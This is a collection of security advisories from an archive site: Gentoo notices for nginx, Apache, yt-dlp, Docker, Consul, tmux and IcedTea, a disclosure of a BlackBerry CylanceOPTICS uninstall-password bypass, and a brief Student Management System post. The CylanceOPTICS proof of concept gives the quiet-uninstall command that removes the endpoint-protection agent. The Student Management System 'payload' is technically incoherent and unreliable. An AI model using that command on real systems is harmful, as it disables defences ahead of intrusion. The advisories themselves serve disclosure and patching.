Gentoo Linux Security Advisory 202409-32 - Multiple vulnerabilities have been discovered in nginx, the worst of which could result in denial of service. Versions greater than or equal to 1.26.2-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: nginx: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #924619, #937938  
       ID: 202409-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in nginx, the worst of  
which could result in denial of service.

Background  
==========

nginx is a robust, small, and high performance HTTP and reverse proxy  
server.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
www-servers/nginx  < 1.26.2-r2   >= 1.26.2-r2

Description  
===========

Multiple vulnerabilities have been discovered in nginx. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All nginx users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/nginx-1.26.2-r2"

References  
==========

[ 1 ] CVE-2024-7347  
      https://nvd.nist.gov/vuln/detail/CVE-2024-7347  
[ 2 ] CVE-2024-24989  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24989  
[ 3 ] CVE-2024-24990  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24990

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-32

Gentoo Linux Security Advisory 202409-31 - Multiple vulnerabilities have been found in Apache HTTPD, the worst of which could result in denial of service. Versions greater than or equal to 2.4.62 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-31  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Apache HTTPD: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #928540, #935296, #935427, #936257  
       ID: 202409-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Apache HTTPD, the worst of  
which could result in denial of service.

Background  
==========

The Apache HTTP server is one of the most popular web servers on the  
Internet.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
www-servers/apache  < 2.4.62      >= 2.4.62

Description  
===========

Multiple vulnerabilities have been discovered in Apache HTTPD. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache HTTPD users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.62"

References  
==========

[ 1 ] CVE-2023-38709  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38709  
[ 2 ] CVE-2024-24795  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24795  
[ 3 ] CVE-2024-27316  
      https://nvd.nist.gov/vuln/detail/CVE-2024-27316  
[ 4 ] CVE-2024-36387  
      https://nvd.nist.gov/vuln/detail/CVE-2024-36387  
[ 5 ] CVE-2024-38472  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38472  
[ 6 ] CVE-2024-38473  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38473  
[ 7 ] CVE-2024-38474  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38474  
[ 8 ] CVE-2024-38475  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38475  
[ 9 ] CVE-2024-38476  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38476  
[ 10 ] CVE-2024-38477  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38477  
[ 11 ] CVE-2024-39573  
      https://nvd.nist.gov/vuln/detail/CVE-2024-39573  
[ 12 ] CVE-2024-39884  
      https://nvd.nist.gov/vuln/detail/CVE-2024-39884  
[ 13 ] CVE-2024-40725  
      https://nvd.nist.gov/vuln/detail/CVE-2024-40725  
[ 14 ] CVE-2024-40898  
      https://nvd.nist.gov/vuln/detail/CVE-2024-40898

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-31

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-31

BlackBerry CylanceOPTICS versions prior to 3.3 MR2 and 3.2 MR5 suffer from an uninstall password bypass vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20240925-0 >  
=======================================================================  
              title: Uninstall Password Bypass  
            product: BlackBerry CylanceOPTICS Windows Installer Package  
 vulnerable version: CylanceOPTICS <3.3 MR2  
                     CylanceOPTICS <3.2 MR5  
      fixed version: CylanceOPTICS 3.3 MR2  
                     CylanceOPTICS 3.2 MR5  
         CVE number: CVE-2024-35214  
             impact: high  
           homepage: https://www.blackberry.com/us/en/support/cylance  
              found: 2023-12-12  
                 by: Initially by Rene Grubmair (Greiner)  
                     P. Espernberger (Office Leonding)  
                     M. Engleitner (Office Leonding)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"CylanceOPTICS is an endpoint detection and response solution that collects  
and analyzes forensic data from devices to identify and resolve threats  
before they impact your organization’s users and data."

Source: https://docs.blackberry.com/en/unified-endpoint-security/blackberry-ues/overview/What-is-BlackBerry-Optics

Business recommendation:  
------------------------  
The vendor provides a patched version which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Uninstall Password Bypass (CVE-2024-35214)  
Due to the quiet (un-)installation feature offered by the CylanceOPTICS  
application, the uninstaller can be called directly without requiring  
a previously set uninstall password.

In order to exploit this vulnerability, an attacker must have local admin  
rights.

Proof of concept:  
-----------------  
1) Uninstall Password Bypass (CVE-2024-35214)  
The path to the MSI uninstaller can be found by searching the  
Windows Registry for "CylanceOPTICS" which results in the following  
node containing uninstall information for the 64bit application:

HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{6e96194b-ca7b-40a4-badd-7eac94ea62c7}

To uninstall CylanceOPTICS without being prompted for a password,  
the QuietUninstallString command is executed as privileged user on  
the system.

"C:\ProgramData\Package Cache\{6e96194b-ca7b-40a4-badd-7eac94ea62c7}\CylanceOPTICSSetup.exe" /uninstall /quiet

Afterwards, the CylanceOPTICS application is successfully removed.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested by SEC Consult which was the most  
recent version available at the time of the test:  
* 3.2.2199.0

According to the vendor, all previous versions are affected:  
* CylanceOPTICS <3.3 MR2  
* CylanceOPTICS <3.2 MR5

Vendor contact timeline:  
------------------------  
2024-02-02: Contacting vendor through secure@blackberry.com, case  
            BIRT2024-00128 was created  
2024-02-02: Auto-response, case is being tracked as # BIRT2024-00128  
2024-02-07: Vendor requests settings of the CylanceConsole device.  
            Vendor is currently attempting to reproduce the vulnerability.  
2024-02-08: The requested settings were provided.  
2024-02-09: Vendor confirms the Uninstall Password Bypass vulnerability.  
            Additional information (log files) are requested.  
            Clarification of the impact of the vulnerability is requested.  
2024-02-15: Explanation has been sent. Log files could not be provided  
            as the device has already been reset.  
2024-02-15: The vulnerability was escalated to the development team.  
2024-02-23: Short update was provided outlining the current plan to  
            fix the vulnerability until summer 2024.  
            Vendor commits to bi-weekly updates on their progress.  
2024-04-19: Expected release date (June 3rd) was communicated and  
            the CVE number was provided.  
2024-05-21: Coordination of the joint release date (2024-06-11) and  
            providing the updated security advisory and new CVE number.  
2024-06-07: Vendor released CylanceOPTICS 3.3 MR1 and CylanceOPTICS 3.2 MR4  
            on 4th June. But requests advisory disclosure to be delayed to  
            10th September because of identified weakness in current solution.  
2024-08-20: Vendor releases new version 3.3 MR2 and 3.2 MR5.  
2024-09-25: Coordinated release of security advisory.

SEC Consult was informed about the progress bi-weekly.  
Only the most relevant information is included in the timeline.

Solution:  
---------  
The vendor provides the following patched versions to their customers:  
* CylanceOPTICS 3.3 MR2  
* CylanceOPTICS 3.2 MR5

In addition to the updated versions, the vendor has released an  
optional script which customers can run to remove the old version and replace  
it with the update. New customers, or customers who uninstall /  
reinstall will not need to run the script, nor will existing customers  
who have not configured an Uninstall password.

The vendor provides the following security notes with further information:  
https://support.blackberry.com/pkb/s/article/140080

Workaround:  
-----------  
As a workaround, it is possible to delete the affected CylanceOPTICSSetup.exe  
binary.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Engleitner, P. Espernberger / @2024

BlackBerry CylanceOPTICS Uninstall Password Bypass

Gentoo Linux Security Advisory 202409-30 - Multiple vulnerabilities have been found in yt-dlp, the worst of which could result in arbitrary code execution. Versions greater than or equal to 2024.07.01 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-30  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: yt-dlp: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #909780, #917355, #935316  
       ID: 202409-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in yt-dlp, the worst of which  
could result in arbitrary code execution.

Background  
==========

yt-dlp is a youtube-dl fork with additional features and fixes.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  -------------  
net-misc/yt-dlp  < 2024.07.01  >= 2024.07.01

Description  
===========

Multiple vulnerabilities have been found in yt-dlp. Please review the  
referenced CVE identifiers for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All yt-dlp users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/yt-dlp-2024.07.01"

References  
==========

[ 1 ] CVE-2023-35934  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35934  
[ 2 ] CVE-2023-46121  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46121  
[ 3 ] CVE-2024-38519  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38519

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-30

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-30

Gentoo Linux Security Advisory 202409-29 - Multiple vulnerabilities have been discovered in Docker, the worst of which could result in denial of service. Versions greater than or equal to 25.0.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-29  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Docker: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #816273, #869407, #877653, #886509, #903804, #905336, #925022  
       ID: 202409-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Docker, the worst of  
which could result in denial of service.

Background  
==========

Docker contains the the core functions you need to create Docker images  
and run Docker containers

Affected packages  
=================

Package                Vulnerable    Unaffected  
---------------------  ------------  ------------  
app-containers/docker  < 25.0.4      >= 25.0.4

Description  
===========

Multiple vulnerabilities have been discovered in Docker. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Docker users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-containers/docker-25.0.4"

References  
==========

[ 1 ] CVE-2021-41089  
      https://nvd.nist.gov/vuln/detail/CVE-2021-41089  
[ 2 ] CVE-2021-41091  
      https://nvd.nist.gov/vuln/detail/CVE-2021-41091  
[ 3 ] CVE-2022-36109  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36109  
[ 4 ] CVE-2022-41717  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41717  
[ 5 ] CVE-2023-26054  
      https://nvd.nist.gov/vuln/detail/CVE-2023-26054  
[ 6 ] CVE-2023-28840  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28840  
[ 7 ] CVE-2023-28841  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28841  
[ 8 ] CVE-2023-28842  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28842  
[ 9 ] CVE-2024-23650  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23650  
[ 10 ] CVE-2024-23651  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23651  
[ 11 ] CVE-2024-23652  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23652  
[ 12 ] CVE-2024-23653  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23653  
[ 13 ] CVE-2024-24557  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24557

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-29

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-29

Gentoo Linux Security Advisory 202409-28 - Multiple vulnerabilities have been discovered in HashiCorp Consul, the worst of which could result in denial of service. Versions greater than or equal to 1.15.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: HashiCorp Consul: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #885997  
       ID: 202409-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in HashiCorp Consul, the  
worst of which could result in denial of service.

Background  
==========

HashiCorp Consul is a tool for service discovery, monitoring and  
configuration.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
app-admin/consul  < 1.15.10     >= 1.15.10

Description  
===========

Multiple vulnerabilities have been found in HashiCorp Consul. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the CVE identifiers referenced below for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All HashiCorp Consul users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/consul-1.15.10"

References  
==========

[ 1 ] CVE-2022-41717  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41717

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-28

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-28

Gentoo Linux Security Advisory 202409-27 - A vulnerability has been found in tmux which could result in application crash. Versions greater than or equal to 3.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: tmux: Null Pointer Dereference  
     Date: September 28, 2024  
     Bugs: #891783  
       ID: 202409-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in tmux which could result in application  
crash.

Background  
==========

tmux is a terminal multiplexer.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-misc/tmux  < 3.4         >= 3.4

Description  
===========

A null pointer dereference issue was discovered in function  
window_pane_set_event in window.c in which allows attackers to cause  
denial of service or other unspecified impacts.

Impact  
======

Manipulating tmux window state could result in a null pointer  
dereference.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All tmux users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-misc/tmux-3.4"

References  
==========

[ 1 ] CVE-2022-47016  
      https://nvd.nist.gov/vuln/detail/CVE-2022-47016

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-27

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-27

Gentoo Linux Security Advisory 202409-26 - Multiple vulnerabilities have been found in IcedTea, the worst of which could result in arbitrary code execution. Versions less than or equal to 3.21.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: IcedTea: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #732628, #803608, #877599  
       ID: 202409-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in IcedTea, the worst of which  
could result in arbitrary code execution.

Background  
==========

IcedTea’s aim is to provide OpenJDK in a form suitable for easy  
configuration, compilation and distribution with the primary goal of  
allowing inclusion in GNU/Linux distributions.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-java/icedtea      <= 3.21.0     Vulnerable!  
dev-java/icedtea-bin  <= 3.16.0-r2  Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in IcedTea. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for IcedTea. We recommend that users  
unmerge it:

  # emerge --sync  
  # emerge --ask --depclean "dev-java/icedtea" "dev-java/icedtea-bin"

References  
==========

[ 1 ] CVE-2020-14556  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14556  
[ 2 ] CVE-2020-14562  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14562  
[ 3 ] CVE-2020-14573  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14573  
[ 4 ] CVE-2020-14577  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14577  
[ 5 ] CVE-2020-14578  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14578  
[ 6 ] CVE-2020-14579  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14579  
[ 7 ] CVE-2020-14581  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14581  
[ 8 ] CVE-2020-14583  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14583  
[ 9 ] CVE-2020-14593  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14593  
[ 10 ] CVE-2020-14621  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14621  
[ 11 ] CVE-2020-14664  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14664  
[ 12 ] CVE-2020-14779  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14779  
[ 13 ] CVE-2020-14781  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14781  
[ 14 ] CVE-2020-14782  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14782  
[ 15 ] CVE-2020-14792  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14792  
[ 16 ] CVE-2020-14796  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14796  
[ 17 ] CVE-2020-14797  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14797  
[ 18 ] CVE-2020-14798  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14798  
[ 19 ] CVE-2020-14803  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14803  
[ 20 ] CVE-2021-2341  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2341  
[ 21 ] CVE-2021-2369  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2369  
[ 22 ] CVE-2021-2388  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2388  
[ 23 ] CVE-2021-2432  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2432  
[ 24 ] CVE-2021-35550  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35550  
[ 25 ] CVE-2021-35556  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35556  
[ 26 ] CVE-2021-35559  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35559  
[ 27 ] CVE-2021-35561  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35561  
[ 28 ] CVE-2021-35564  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35564  
[ 29 ] CVE-2021-35565  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35565  
[ 30 ] CVE-2021-35567  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35567  
[ 31 ] CVE-2021-35578  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35578  
[ 32 ] CVE-2021-35586  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35586  
[ 33 ] CVE-2021-35588  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35588  
[ 34 ] CVE-2021-35603  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35603  
[ 35 ] CVE-2022-21618  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21618  
[ 36 ] CVE-2022-21619  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21619  
[ 37 ] CVE-2022-21624  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21624  
[ 38 ] CVE-2022-21626  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21626  
[ 39 ] CVE-2022-21628  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21628  
[ 40 ] CVE-2022-39399  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39399  
[ 41 ] CVE-2023-21830  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21830  
[ 42 ] CVE-2023-21835  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21835  
[ 43 ] CVE-2023-21843  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21843

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-26

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-26

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

**Student Management System 1.0 Insecure Cookie Handling**

Posted Sep 30, 2024

Authored by indoushka

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

tags | exploit, insecure cookie handling

SHA-256 | d658fbfc8c6a719141fdd1f2794283b78eab23b21c7970420e8965f026849eba

Download | Favorite | View

**Student Management System 1.0 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Student Management System 1.0 Insecure Cookie Handling Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] The default username is admin & The chosen password is user123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,997)
*   Arbitrary (17,113)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,047)
*   Code Execution (7,925)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,434)
*   DoS (25,304)
*   Encryption (2,395)
*   Exploit (54,342)
*   File Inclusion (4,278)
*   File Upload (1,022)
*   Firewall (822)
*   Info Disclosure (2,924)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,310)
*   Local (14,864)
*   Magazine (587)
*   Overflow (13,228)
*   Perl (1,435)
*   PHP (5,284)
*   Proof of Concept (2,413)
*   Protocol (3,751)
*   Python (1,662)
*   Remote (31,922)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,052)
*   Shell (3,308)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,738)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,133)
*   Web (10,144)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,306)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,130)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,374)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,912)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,882)
